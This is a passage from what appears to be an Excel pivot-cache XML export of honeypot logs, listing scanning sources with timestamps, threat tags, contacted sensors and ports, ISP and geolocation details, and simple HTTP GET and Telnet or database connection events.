    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:8aa8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3693"/>
    <x v="3693"/>
    <s v="114-33-209-132.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:13:27"/>
    <d v="2024-04-11T12:19:00"/>
    <d v="2025-04-01T20:13:27"/>
    <n v="226"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1680&amp;&amp;23&amp;&amp;47941&amp;&amp;47264&amp;&amp;80"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7221:d184"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3694"/>
    <x v="3694"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T19:57:52"/>
    <d v="2025-04-01T19:57:52"/>
    <d v="2025-04-01T19:57:52"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:37d7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3695"/>
    <x v="3695"/>
    <s v="220-132-126-94.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T19:48:19"/>
    <d v="2024-08-27T04:47:22"/>
    <d v="2025-04-01T19:48:19"/>
    <n v="195"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTP_H40&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc84:7e5e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3696"/>
    <x v="3696"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T19:40:16"/>
    <d v="2025-04-01T19:37:23"/>
    <d v="2025-04-01T19:40:16"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:2f28"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3697"/>
    <x v="3697"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T19:21:28"/>
    <d v="2025-04-01T19:19:11"/>
    <d v="2025-04-01T19:21:28"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="45609"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Tele Ventures Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b3b:1572"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3698"/>
    <x v="3698"/>
    <s v="220-132-157-191.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T19:21:25"/>
    <d v="2023-11-29T00:13:19"/>
    <d v="2025-04-01T19:21:25"/>
    <n v="415"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;38068&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc84:9dbf"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3699"/>
    <x v="3699"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:59:10"/>
    <d v="2025-04-01T18:53:11"/>
    <d v="2025-04-01T18:59:10"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3986"/>
    <s v="-121.964"/>
    <s v="14061"/>
    <s v="DigitalOcean, LLC"/>
    <s v="DigitalOcean, LLC"/>
    <s v="hosting"/>
    <s v="DigitalOcean, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2g'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2h'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:92be:adb2"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3700"/>
    <x v="3700"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:58:55"/>
    <d v="2025-04-01T18:58:55"/>
    <d v="2025-04-01T18:58:55"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:7b88"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3701"/>
    <x v="3701"/>
    <s v="220-133-203-74.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:52:29"/>
    <d v="2023-07-26T15:25:59"/>
    <d v="2025-04-01T18:52:29"/>
    <n v="2126"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;23651&amp;&amp;23&amp;&amp;NA"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:cb4a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3702"/>
    <x v="3702"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:48:57"/>
    <d v="2023-07-25T04:12:48"/>
    <d v="2025-04-01T18:48:57"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="6667&amp;&amp;5900&amp;&amp;22&amp;&amp;389&amp;&amp;443&amp;&amp;53&amp;&amp;27869&amp;&amp;1433&amp;&amp;57489"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Airoli"/>
    <s v="7279599"/>
    <s v="NA"/>
    <s v="19.151"/>
    <s v="72.9962"/>
    <s v="137127"/>
    <s v="Navkar Supertech Pvt Ltd"/>
    <s v="Navkar Supertech Pvt Ltd"/>
    <s v="business"/>
    <s v="Omsainet"/>
    <s v="2021-08-16"/>
    <s v="OMSAINET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ab:c9ea"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3703"/>
    <x v="3703"/>
    <s v="122-116-113-188.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:45:44"/>
    <d v="2025-01-15T04:51:49"/>
    <d v="2025-04-01T18:45:44"/>
    <n v="185"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23&amp;&amp;80&amp;&amp;NA&amp;&amp;44647"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7a74:71bc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3704"/>
    <x v="3704"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:40:44"/>
    <d v="2025-04-01T18:38:46"/>
    <d v="2025-04-01T18:40:44"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2007-01-11"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b12:8c77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3705"/>
    <x v="3705"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:29:49"/>
    <d v="2025-03-07T13:17:20"/>
    <d v="2025-04-01T18:29:49"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b61:f57e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3706"/>
    <x v="3706"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:29:45"/>
    <d v="2025-04-01T18:06:05"/>
    <d v="2025-04-01T18:29:45"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:ea7a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3707"/>
    <x v="3707"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T18:28:54"/>
    <d v="2023-07-24T18:16:06"/>
    <d v="2025-04-01T18:28:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTP_H46&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="1080&amp;&amp;9100&amp;&amp;5900&amp;&amp;443&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;22&amp;&amp;4332&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
